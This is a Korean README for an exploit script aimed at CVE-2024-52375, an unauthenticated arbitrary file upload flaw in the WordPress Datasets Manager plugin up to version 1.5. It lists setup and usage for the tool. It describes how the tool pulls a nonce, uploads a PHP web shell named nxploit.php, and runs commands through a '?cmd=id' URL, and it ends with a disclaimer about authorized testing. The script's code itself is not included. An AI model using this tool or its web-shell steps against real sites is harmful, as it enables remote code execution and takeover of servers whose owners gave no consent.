
WordPress Datasets Manager (Arttia Creative 제작) 플러그인 <= 1.5 - 임의 파일 업로드 취약점
💥 제작자: Nxploit (Khaled Alenazi)
📅 CVE 발표일: 2024년 11월 14일
🧠 CVSS 점수: 10.0 (Critical)
🛠 CWE-434: 위험한 유형의 파일 무제한 업로드
Arttia Creative의 Datasets Manager WordPress 플러그인에서 버전 1.5 이하에 영향을 미치는 심각한 취약점이 발견되었습니다.
이 플러그인은 업로드 과정에서 파일 유형을 제대로 검증하지 않아, 인증되지 않은 공격자가 PHP 셸을 포함한 임의의 파일을 업로드하고 **원격 코드 실행(RCE)**을 달성할 수 있습니다.
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:Hrequests 라이브러리:
pip install requests
usage: CVE-2024-52375.py [-h] -u URL
Exploit for WordPress Datasets Manager <= 1.5 - Arbitrary File Upload | By: Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Full target URL (e.g. http://target.com/wordpress)
대상 WordPress 설치의 전체 경로로 URL을 바꾸세요.
성공하면 스크립트는 다음을 수행합니다:
_wpnonce를 추출합니다.nxploit.php라는 PHP 셸을 업로드합니다.[+] Shell available at:
http://target.com/wordpress/wp-content/uploads/2025/03/nxploit.php
다음과 같이 명령을 실행할 수 있습니다:
http://target.com/wordpress/wp-content/uploads/2025/03/nxploit.php?cmd=id
readme.txt를 통해 플러그인 버전을 자동으로 확인합니다.<= 1.5 버전만 취약합니다.이 도구는 교육 및 승인된 테스트 목적으로만 제공됩니다.
소유하지 않거나 테스트할 권한이 없는 시스템에 사용하는 것은 불법입니다.